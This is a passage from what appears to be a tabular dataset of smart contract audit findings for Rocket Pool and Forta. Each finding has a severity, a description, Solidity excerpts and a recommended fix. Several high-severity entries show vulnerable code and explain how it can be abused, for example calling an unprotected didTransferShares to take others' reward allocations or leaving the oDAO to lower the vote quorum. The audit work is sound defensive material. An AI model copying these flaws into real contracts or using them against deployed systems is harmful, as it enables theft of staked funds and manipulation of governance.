assumes `address` for contract types by default. An explicit downcast is not required.\\n```\\n » Test example = Test(0x5B38Da6a701c568545dCfcB03FcB875f56beddC4)\\n » abi.encodePacked(""hi"", example)\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n » abi.encodePacked(""hi"", address(example))\\n0x68695b38da6a701c568545dcfcb03fcb875f56beddc4\\n```\\n\\nMore examples of `address _minipool` declarations:\\n```\\n/// @dev Internal logic to set a minipool's pubkey\\n/// @param \\_pubkey The pubkey to set for the calling minipool\\nfunction \\_setMinipoolPubkey(address \\_minipool, bytes calldata \\_pubkey) private {\\n // Load contracts\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(""addressSetStorage""));\\n // Initialize minipool & get properties\\n RocketMinipoolInterface minipool = RocketMinipoolInterface(\\_minipool);\\n```\\n\\n```\\nfunction getMinipoolDetails(address \\_minipoolAddress) override external view returns (MinipoolDetails memory) {\\n // Get contracts\\n RocketMinipoolInterface minipoolInterface = RocketMinipoolInterface(\\_minipoolAddress);\\n RocketMinipoolBase minipool = RocketMinipoolBase(payable(\\_minipoolAddress));\\n RocketNetworkPenaltiesInterface rocketNetworkPenalties = RocketNetworkPenaltiesInterface(getContractAddress(""rocketNetworkPenalties""));\\n```\\n\\nMore examples of `RocketStorageInterface _rocketStorage` casts:\\n```\\ncontract RocketNodeDistributor is RocketNodeDistributorStorageLayout {\\n bytes32 immutable distributorStorageKey;\\n\\n constructor(address \\_nodeAddress, address \\_rocketStorage) {\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n nodeAddress = \\_nodeAddress;\\n```\\n",We recommend using more specific types instead of `address` where possible. Downcast if necessary. 
This goes for parameter types as well as state variable types.,,"```\\n/// @notice Sets up starting delegate contract and then delegates initialisation to it\\nfunction initialise(address \\_rocketStorage, address \\_nodeAddress) external override notSelf {\\n // Check input\\n require(\\_nodeAddress != address(0), ""Invalid node address"");\\n require(storageState == StorageState.Undefined, ""Already initialised"");\\n // Set storage state to uninitialised\\n storageState = StorageState.Uninitialised;\\n // Set rocketStorage\\n rocketStorage = RocketStorageInterface(\\_rocketStorage);\\n```\\n" +Redundant double casts Acknowledged,low,"`_rocketStorageAddress` is already of contract type `RocketStorageInterface`.\\n```\\n/// @dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n\\n`_tokenAddress` is already of contract type `ERC20Burnable`.\\n```\\nfunction burnToken(ERC20Burnable \\_tokenAddress, uint256 \\_amount) override external onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender), \\_tokenAddress));\\n // Update balances\\n tokenBalances[contractKey] = tokenBalances[contractKey].sub(\\_amount);\\n // Get the token ERC20 instance\\n ERC20Burnable tokenContract = ERC20Burnable(\\_tokenAddress);\\n```\\n\\n`_rocketTokenRPLFixedSupplyAddress` is already of contract type `IERC20`.\\n```\\nconstructor(RocketStorageInterface \\_rocketStorageAddress, IERC20 \\_rocketTokenRPLFixedSupplyAddress) RocketBase(\\_rocketStorageAddress) ERC20(""Rocket Pool Protocol"", ""RPL"") {\\n // Version\\n version = 1;\\n // Set the mainnet RPL fixed supply token address\\n rplFixedSupplyContract = IERC20(\\_rocketTokenRPLFixedSupplyAddress);\\n```\\n",We recommend removing the unnecessary double casts and copies of local variables.,,```\\n/// 
@dev Set the main Rocket Storage address\\nconstructor(RocketStorageInterface \\_rocketStorageAddress) {\\n // Update the contract address\\n rocketStorage = RocketStorageInterface(\\_rocketStorageAddress);\\n}\\n```\\n +RocketMinipoolDelegate - Missing event in prepareVacancy,low,"The function `prepareVacancy` updates multiple contract state variables and should therefore emit an event.\\n```\\n/// @dev Sets the bond value and vacancy flag on this minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(""rocketMinipoolManager"", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, ""Must be in initialised status"");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, ""Refund balance not zero"");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(""rocketDAOProtocolSettingsMinipool""));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, ""Balance is too low"");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\n",Emit the missing event.,,"```\\n/// @dev Sets the bond value and vacancy flag on this 
minipool\\n/// @param \\_bondAmount The bond amount selected by the node operator\\n/// @param \\_currentBalance The current balance of the validator on the beaconchain (will be checked by oDAO and scrubbed if not correct)\\nfunction prepareVacancy(uint256 \\_bondAmount, uint256 \\_currentBalance) override external onlyLatestContract(""rocketMinipoolManager"", msg.sender) onlyInitialised {\\n // Check status\\n require(status == MinipoolStatus.Initialised, ""Must be in initialised status"");\\n // Sanity check that refund balance is zero\\n require(nodeRefundBalance == 0, ""Refund balance not zero"");\\n // Check balance\\n RocketDAOProtocolSettingsMinipoolInterface rocketDAOProtocolSettingsMinipool = RocketDAOProtocolSettingsMinipoolInterface(getContractAddress(""rocketDAOProtocolSettingsMinipool""));\\n uint256 launchAmount = rocketDAOProtocolSettingsMinipool.getLaunchBalance();\\n require(\\_currentBalance >= launchAmount, ""Balance is too low"");\\n // Store bond amount\\n nodeDepositBalance = \\_bondAmount;\\n // Calculate user amount from launch amount\\n userDepositBalance = launchAmount.sub(nodeDepositBalance);\\n // Flag as vacant\\n vacant = true;\\n preMigrationBalance = \\_currentBalance;\\n // Refund the node whatever rewards they have accrued prior to becoming a RP validator\\n nodeRefundBalance = \\_currentBalance.sub(launchAmount);\\n // Set status to preLaunch\\n setStatus(MinipoolStatus.Prelaunch);\\n}\\n```\\n" +RocketMinipool - Inconsistent access control modifier declaration onlyMinipoolOwner Acknowledged,low,"The access control modifier `onlyMinipoolOwner` should be renamed to `onlyMinipoolOwnerOrWithdrawalAddress` to be consistent with the actual check permitting the owner or the withdrawal address to interact with the function. 
This would also be consistent with other declarations in the codebase.\\nExample\\nThe `onlyMinipoolOwner` modifier in `RocketMinipoolBase` is the same as `onlyMinipoolOwnerOrWithdrawalAddress` in other modules.\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, ""Only the node operator can access this method"");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, ""Only the node operator can access this method"");\\n \\_;\\n}\\n```\\n\\nOther declarations:\\n```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, ""Invalid minipool owner"");\\n \\_;\\n}\\n\\n/// @dev Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), ""Invalid minipool owner"");\\n \\_;\\n}\\n```\\n\\n```\\n// Only allow access from the owning node address\\nmodifier onlyMinipoolOwner(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress, ""Invalid minipool owner"");\\n \\_;\\n}\\n\\n// Only allow access from the owning node address or their withdrawal address\\nmodifier onlyMinipoolOwnerOrWithdrawalAddress(address \\_nodeAddress) {\\n require(\\_nodeAddress == nodeAddress || \\_nodeAddress == rocketStorage.getNodeWithdrawalAddress(nodeAddress), ""Invalid minipool owner"");\\n 
\\_;\\n}\\n```\\n",Resolution\\nAcknowledged by the client. Not addressed within rocket-pool/[email protected]77d7cca\\nAgreed. This would change a lot of contracts just for a minor improvement in readability.\\nWe recommend renaming `RocketMinipoolBase.onlyMinipoolOwner` to `RocketMinipoolBase.onlyMinipoolOwnerOrWithdrawalAddress`.,,"```\\n/// @dev Only allow access from the owning node address\\nmodifier onlyMinipoolOwner() {\\n // Only the node operator can upgrade\\n address withdrawalAddress = rocketStorage.getNodeWithdrawalAddress(nodeAddress);\\n require(msg.sender == nodeAddress || msg.sender == withdrawalAddress, ""Only the node operator can access this method"");\\n \\_;\\n}\\n```\\n
RocketDAOProtocolSettings(\\_rocketStorageAddress, ""auction"") {\\n // Set version\\n version = 1;\\n```\\n",We recommend using the `immutable` annotation in Solidity (see Immutable).,,```\\n// The namespace for a particular group of settings\\nbytes32 settingNameSpace;\\n```\\n +Kicked oDAO members' votes taken into account Acknowledged,medium,"oDAO members can vote on proposals or submit external data to the system, acting as an oracle. Data submission is based on a vote by itself, and multiple oDAO members must submit the same data until a configurable threshold (51% by default) is reached for the data to be confirmed.\\nWhen a member gets kicked or leaves the oDAO after voting, their vote is still accounted for while the total number of oDAO members decreases.\\nA (group of) malicious oDAO actors may exploit this fact to artificially lower the consensus threshold by voting for a proposal and then leaving the oDAO. This will leave excess votes with the proposal while the total member count decreases.\\nFor example, let's assume there are 17 oDAO members. 9 members must vote for the proposal for it to pass (52.9%). Let's assume 8 members voted for, and the rest abstained and is against the proposal (47%, threshold not met). The proposal is unlikely to pass unless two malicious oDAO members leave the DAO, lowering the member count to 15 in an attempt to manipulate the vote, suddenly inflating vote power from 8/17 (47%; rejected) to 8/15 (53.3%; passed).\\nThe crux is that the votes of ex-oDAO members still count, while the quorum is based on the current oDAO member number.\\nHere are some examples, however, this is a general pattern used for oDAO votes in the system.\\nExample: RocketNetworkPrices\\nMembers submit votes via `submitPrices()`. If the threshold is reached, the proposal is executed. Quorum is based on the current oDAO member count, votes of ex-oDAO members are still accounted for. 
If a proposal is a near miss, malicious actors can force execute it by leaving the oDAO, lowering the threshold, and then calling `executeUpdatePrices()` to execute it.\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n\\n```\\nfunction executeUpdatePrices(uint256 \\_block, uint256 \\_rplPrice) override external onlyLatestContract(""rocketNetworkPrices"", address(this)) {\\n // Check settings\\n```\\n\\nRocketMinipoolBondReducer\\nThe `RocketMinipoolBondReducer` contract's `voteCancelReduction` function takes old votes of previously kicked oDAO members into account. This results in the vote being significantly higher and increases the potential for malicious actors, even after their removal, to sway the vote. 
Note that a canceled bond reduction cannot be undone.\\n```\\nRocketDAONodeTrustedSettingsMinipoolInterface rocketDAONodeTrustedSettingsMinipool = RocketDAONodeTrustedSettingsMinipoolInterface(getContractAddress(""rocketDAONodeTrustedSettingsMinipool""));\\nuint256 quorum = rocketDAONode.getMemberCount().mul(rocketDAONodeTrustedSettingsMinipool.getCancelBondReductionQuorum()).div(calcBase);\\nbytes32 totalCancelVotesKey = keccak256(abi.encodePacked(""minipool.bond.reduction.vote.count"", \\_minipoolAddress));\\nuint256 totalCancelVotes = getUint(totalCancelVotesKey).add(1);\\nif (totalCancelVotes > quorum) {\\n```\\n\\nRocketNetworkPenalties\\n```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodePenaltyThreshold()) {\\n setBool(executedKey, true);\\n incrementMinipoolPenaltyCount(\\_minipoolAddress);\\n}\\n```\\n\\n```\\n// Executes incrementMinipoolPenaltyCount if consensus threshold is reached\\nfunction executeUpdatePenalty(address \\_minipoolAddress, uint256 \\_block) override external onlyLatestContract(""rocketNetworkPenalties"", address(this)) {\\n // Get contracts\\n RocketDAOProtocolSettingsNetworkInterface rocketDAOProtocolSettingsNetwork = RocketDAOProtocolSettingsNetworkInterface(getContractAddress(""rocketDAOProtocolSettingsNetwork""));\\n // Get submission keys\\n```\\n",Track oDAO members' votes and remove them from the tally when the removal from the oDAO is executed.,,"```\\nRocketDAONodeTrustedInterface rocketDAONodeTrusted = RocketDAONodeTrustedInterface(getContractAddress(""rocketDAONodeTrusted""));\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n // Update the price\\n updatePrices(\\_block, \\_rplPrice);\\n}\\n```\\n" +didTransferShares 
function has no access control modifier,high,"The staked tokens (shares) in Forta are meant to be transferable. Similarly, the rewards allocation for these shares for delegated staking is meant to be transferable as well. This allocation for the shares' owner is tracked in the `StakeAllocator`. To enable this, the Forta staking contract `FortaStaking` implements a `_beforeTokenTransfer()` function that calls `_allocator.didTransferShares()` when it is appropriate to transfer the underlying allocation.\\n```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n\\nDue to this, the `StakeAllocator.didTransferShares()` has an `external` visibility so it can be called from the `FortaStaking` contract to perform transfers. However, there is no access control modifier to allow only the staking contract to call this. Therefore, anyone can call this function with whatever parameters they want.\\n```\\nfunction didTransferShares(\\n uint256 sharesId,\\n uint8 subjectType,\\n address from,\\n address to,\\n uint256 sharesAmount\\n) external {\\n \\_rewardsDistributor.didTransferShares(sharesId, subjectType, from, to, sharesAmount);\\n}\\n```\\n\\nSince the allocation isn't represented as a token standard and is tracked directly in the `StakeAllocator` and `RewardsDistributor`, it lacks many standard checks that would prevent abuse of the function. 
For example, this function does not have a check for allowance or `msg.sender==from`, so any user could call `didTransferShares()` with `to` being their address and `from` being any address they want `to` transfer allocation `from`, and the call would succeed.","Apply access control modifiers as appropriate for this contract, for example `onlyRole()`.",,"```\\nfunction \\_beforeTokenTransfer(\\n address operator,\\n address from,\\n address to,\\n uint256[] memory ids,\\n uint256[] memory amounts,\\n bytes memory data\\n) internal virtual override {\\n for (uint256 i = 0; i < ids.length; i++) {\\n if (FortaStakingUtils.isActive(ids[i])) {\\n uint8 subjectType = FortaStakingUtils.subjectTypeOfShares(ids[i]);\\n if (subjectType == DELEGATOR\\_NODE\\_RUNNER\\_SUBJECT && to != address(0) && from != address(0)) {\\n \\_allocator.didTransferShares(ids[i], subjectType, from, to, amounts[i]);\\n }\\n```\\n" +Incorrect reward epoch start date calculation,high,"The Forta rewards system is based on epochs. A privileged address with the role `REWARDER_ROLE` calls the `reward()` function with a parameter for a specific `epochNumber` that consequently distributes the rewards for that epoch. Additionally, as users stake and delegate their stake, accounts in the Forta system accrue weight that is based on the active stake to distribute these rewards. Since accounts can modify their stake as well as delegate or un-delegate it, the rewards weight for each account can be modified, as seen, for example, in the `didAllocate()` function. In turn, this modifies the `DelegatedAccRewards` storage struct that stores the accumulated rewards for each share id. 
To keep track of changes done to the accumulated rewards, epochs with checkpoints are used to manage the accumulated rate of rewards, their value at the checkpoint, and the timestamp of the checkpoint.\\nFor example, in the `didAllocate()` function the `addRate()` function is being called to modify the accumulated rewards.\\n```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n\\nThen the function flow goes into `setRate()` that checks the existing accumulated rewards storage and modifies it based on the current timestamp.\\n```\\nfunction addRate(Accumulator storage acc, uint256 rate) internal {\\n setRate(acc, latest(acc).rate + rate);\\n}\\n```\\n\\n```\\nfunction setRate(Accumulator storage acc, uint256 rate) internal {\\n EpochCheckpoint memory ckpt = EpochCheckpoint({ timestamp: SafeCast.toUint32(block.timestamp), rate: SafeCast.toUint224(rate), value: getValue(acc) });\\n uint256 length = acc.checkpoints.length;\\n if (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n } else {\\n acc.checkpoints.push(ckpt);\\n }\\n}\\n```\\n\\nNamely, it pushes epoch checkpoints to the list of account checkpoints based on its timestamp. If the last checkpoint's timestamp is during the current epoch, then the last checkpoint is replaced with the new one altogether. If the last checkpoint's timestamp is different from the current epoch, a new checkpoint is added to the list. 
However, the `isCurrentEpoch()` function calls a function `getCurrentEpochTimestamp()` that incorrectly determines the start date of the current epoch. In particular, it doesn't take the offset into account when calculating how many epochs have already passed.\\n```\\nfunction getCurrentEpochTimestamp() internal view returns (uint256) {\\n return ((block.timestamp / EPOCH\\_LENGTH) \\* EPOCH\\_LENGTH) + TIMESTAMP\\_OFFSET;\\n}\\n\\nfunction isCurrentEpoch(uint256 timestamp) internal view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp > currentEpochStart;\\n}\\n```\\n\\nInstead of `((block.timestamp / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`, it should be `(((block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH) * EPOCH_LENGTH) + TIMESTAMP_OFFSET`. In fact, it should simply call the `getEpochNumber()` function that correctly provides the epoch number for any timestamp.\\n```\\nfunction getEpochNumber(uint256 timestamp) internal pure returns (uint32) {\\n return SafeCast.toUint32((timestamp - TIMESTAMP\\_OFFSET) / EPOCH\\_LENGTH);\\n}\\n```\\n\\nIn other words, the resulting function would look something like the following:\\n```\\n function getCurrentEpochTimestamp() public view returns (uint256) {\\n return (getEpochNumber(block.timestamp) * EPOCH_LENGTH) + TIMESTAMP_OFFSET;\\n }\\n```\\n\\nOtherwise, if `block.timestamp` is such that `(block.timestamp - TIMESTAMP_OFFSET) / EPOCH_LENGTH = n` and `block.timestamp` / EPOCH_LENGTH = n+1, which would happen on roughly 4 out of 7 days of the week since `EPOCH_LENGTH = 1 weeks` and `TIMESTAMP_OFFSET = 4 days`, this would cause the `getCurrentEpochTimestamp()` function to return the end timestamp of the epoch (which is in the future) instead of the start. 
Therefore, if a checkpoint with such a timestamp is committed to the account's accumulated rewards checkpoints list, it will always fail the below check in the epoch it got submitted, and any checkpoint committed afterwards but during the same epoch with a similar type of `block.timestamp` (i.e. satisfying the condition at the beginning of this paragraph), would be pushed to the top of the list instead of replacing the previous checkpoint.\\n```\\nif (length > 0 && isCurrentEpoch(acc.checkpoints[length - 1].timestamp)) {\\n acc.checkpoints[length - 1] = ckpt;\\n} else {\\n acc.checkpoints.push(ckpt);\\n```\\n\\nThis causes several checkpoints to be stored for the same epoch, which would cause issues in functions such as `getAtEpoch()`, that feeds into `getValueAtEpoch()` function that provides data for the rewards' share calculation. In the end, this would cause issues in the accounting for the rewards calculation resulting in incorrect distributions.\\nDuring the discussion with the Forta Foundation team, it was additionally discovered that there are edge cases around the limits of epochs. Specifically, epoch's end time and the subsequent epoch's start time are exactly the same, although it should be that it is only the start of the next epoch. Similarly, that start time isn't recognized as part of the epoch due to `>` sign instead of `>=`. 
In particular, the following changes need to be made:\\n```\\n function getEpochEndTimestamp(uint256 epochNumber) public pure returns (uint256) {\\n return ((epochNumber + 1) * EPOCH_LENGTH) + TIMESTAMP_OFFSET - 1; <---- so it is 23:59:59 instead of next day 00:00:00\\n }\\n\\n function isCurrentEpoch(uint256 timestamp) public view returns (bool) {\\n uint256 currentEpochStart = getCurrentEpochTimestamp();\\n return timestamp >= currentEpochStart; <--- for the first second on Monday\\n }\\n```\\n","A refactor of the epoch timestamp calculation functions is recommended to account for:\\nThe correct epoch number to calculate the start and end timestamps of epochs.\\nThe boundaries of epochs coinciding.\\nClarity in functions' intent. For example, adding a function just to calculate any epoch's start time and renaming `getCurrentEpochTimestamp()` to `getCurrentEpochStartTimestamp()`.",,"```\\nfunction didAllocate(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeAmount,\\n uint256 sharesAmount,\\n address staker\\n) external onlyRole(ALLOCATOR\\_CONTRACT\\_ROLE) {\\n bool delegated = getSubjectTypeAgency(subjectType) == SubjectStakeAgency.DELEGATED;\\n if (delegated) {\\n uint8 delegatorType = getDelegatorSubjectType(subjectType);\\n uint256 shareId = FortaStakingUtils.subjectToActive(delegatorType, subject);\\n DelegatedAccRewards storage s = \\_rewardsAccumulators[shareId];\\n s.delegated.addRate(stakeAmount);\\n```\\n" +A single unfreeze dismisses all other slashing proposal freezes,high,"In order to retaliate against malicious actors, the Forta staking system allows users to submit slashing proposals that are guarded by submitting along a deposit with a slashing reason. These proposals immediately freeze the proposal's subject's stake, blocking them from withdrawing that stake.\\nAt the same time, there can be multiple proposals submitted against the same subject, which works out with freezing - the subject remains frozen with each proposal submitted. 
However, once any one of the active proposals against the subject gets to the end of its lifecycle, be it `REJECTED`, `DISMISSED`, `EXECUTED`, or `REVERTED`, the subject gets unfrozen altogether. The other proposals might still be active, but the stake is no longer frozen, allowing the subject to withdraw it if they would like.\\nIn terms of impact, this allows bad actors to avoid punishment intended by the slashes and freezes. A malicious actor could, for example, submit a faulty proposal against themselves in the hopes that it will get quickly rejected or dismissed while the existing, legitimate proposals against them are still being considered. This would allow them to get unfrozen quickly and withdraw their stake. Similarly, in the event a bad staker has several proposals against them, they could withdraw right after a single slashing proposal goes through.\\n```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction rejectSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, REJECTED);\\n \\_submitEvidence(\\_proposalId, REJECTED, \\_evidence);\\n \\_slashDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction reviewSlashProposalParameters(\\n uint256 \\_proposalId,\\n uint8 \\_subjectType,\\n uint256 \\_subjectId,\\n bytes32 \\_penaltyId,\\n string[] calldata \\_evidence\\n) external onlyRole(SLASHING\\_ARBITER\\_ROLE) onlyInState(\\_proposalId, IN\\_REVIEW) onlyValidSlashPenaltyId(\\_penaltyId) onlyValidSubjectType(\\_subjectType) notAgencyType(\\_subjectType, SubjectStakeAgency.DELEGATOR) {\\n // No need to check for proposal existence, onlyInState will revert if 
\\_proposalId is in undefined state\\n if (!subjectGateway.isRegistered(\\_subjectType, \\_subjectId)) revert NonRegisteredSubject(\\_subjectType, \\_subjectId);\\n\\n \\_submitEvidence(\\_proposalId, IN\\_REVIEW, \\_evidence);\\n if (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n }\\n```\\n\\n```\\nfunction revertSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external {\\n \\_authorizeRevertSlashProposal(\\_proposalId);\\n \\_transition(\\_proposalId, REVERTED);\\n \\_submitEvidence(\\_proposalId, REVERTED, \\_evidence);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n\\n```\\nfunction executeSlashProposal(uint256 \\_proposalId) external onlyRole(SLASHER\\_ROLE) {\\n \\_transition(\\_proposalId, EXECUTED);\\n Proposal memory proposal = proposals[\\_proposalId];\\n slashingExecutor.slash(proposal.subjectType, proposal.subjectId, getSlashedStakeValue(\\_proposalId), proposal.proposer, slashPercentToProposer);\\n slashingExecutor.freeze(proposal.subjectType, proposal.subjectId, false);\\n}\\n```\\n\\n```\\nfunction \\_unfreeze(uint256 \\_proposalId) private {\\n slashingExecutor.freeze(proposals[\\_proposalId].subjectType, proposals[\\_proposalId].subjectId, false);\\n}\\n```\\n",Introduce a check in the unfreezing mechanics to first ensure there are no other active proposals for that subject.,,"```\\nfunction dismissSlashProposal(uint256 \\_proposalId, string[] calldata \\_evidence) external onlyRole(SLASHING\\_ARBITER\\_ROLE) {\\n \\_transition(\\_proposalId, DISMISSED);\\n \\_submitEvidence(\\_proposalId, DISMISSED, \\_evidence);\\n \\_returnDeposit(\\_proposalId);\\n \\_unfreeze(\\_proposalId);\\n}\\n```\\n" +Storage gap variables slightly off from the intended size,medium,"The Forta staking system is using upgradeable proxies for its deployment strategy. 
To avoid storage collisions between contract versions during upgrades, uint256[] private `__gap` array variables are introduced that create a storage buffer. Together with contract state variables, the storage slots should sum up to 50. For example, the `__gap` variable is present in the `BaseComponentUpgradeable` component, which is the base of most Forta contracts, and there is a helpful comment in `AgentRegistryCore` that describes how its relevant `__gap` variable size was calculated:\\n```\\nuint256[50] private \\_\\_gap;\\n```\\n\\n```\\nuint256[41] private \\_\\_gap; // 50 - 1 (frontRunningDelay) - 3 (\\_stakeThreshold) - 5 StakeSubjectUpgradeable\\n```\\n\\nHowever, there are a few places where the `__gap` size was not computed correctly to get the storage slots up to 50. Some of these are:\\n```\\nuint256[49] private \\_\\_gap;\\n```\\n\\n```\\nuint256[47] private \\_\\_gap;\\n```\\n\\n```\\nuint256[44] private \\_\\_gap;\\n```\\n\\nWhile these still provide large storage buffers, it is best if the `__gap` variables are calculated to hold the same buffer within contracts of similar types as per the initial intentions to avoid confusion.\\nDuring conversations with the Forta Foundation team, it appears that some contracts like `ScannerRegistry` and `AgentRegistry` should instead add up to 45 with their `__gap` variable due to the `StakeSubject` contracts they inherit from adding 5 from themselves. This is something to note and be careful with as well for future upgrades.",Provide appropriate sizes for the `__gap` variables to have a consistent storage layout approach that would help avoid storage issues with future versions of the system.,,```\\nuint256[50] private \\_\\_gap;\\n```\\n +AgentRegistryCore - Agent Creation DoS,medium,"AgentRegistryCore allows anyone to mint an `agentID` for the desired owner address. 
However, in some cases, it may fall prey to DoS, either deliberately or unintentionally.\\nFor instance, let's assume the Front Running Protection is disabled or the `frontRunningDelay` is 0. It means anyone can directly create an agent without any prior commitment. Thus, anyone can observe pending transactions and try to front run them to mint an `agentID` prior to the victim's restricting it to mint a desired `agentID`.\\nAlso, it may be possible that a malicious actor succeeds in frontrunning a transaction with manipulated data/chainIDs but with the same owner address and `agentID`. There is a good chance that victim still accepts the attacker's transaction as valid, even though its own transaction reverted, due to the fact that the victim is still seeing itself as the owner of that ID.\\nTaking an instance where let's assume the frontrunning protection is enabled. Still, there is a good chance that two users vouch for the same `agentIDs` and commits in the same block, thus getting the same frontrunning delay. 
Then, it will be a game of luck, whoever creates that agent first will get the ID minted to its address, and the other user's transaction will be reverted wasting the time they have spent on the delay.\\nAs the `agentIDs` can be picked by users, the chances of collisions with an already minted ID will increase over time causing unnecessary reverts for others.\\nAdding to the fact that there is no restriction for owner address, anyone can spam mint any `agentID` to any address for any profitable reason.\\n```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\n","Modify function `prepareAgent` to not commit an already registered `agentID`.\\nA better approach could be to allow sequential minting of `agentIDs` using some counters.\\nOnly allow users to mint an `agentID`, either for themselves or for someone they are approved to.",,"```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\n" +Lack of checks for rewarding an epoch that has already been rewarded,medium,"To give rewards to the participating stakers, the Forta system utilizes reward epochs for each 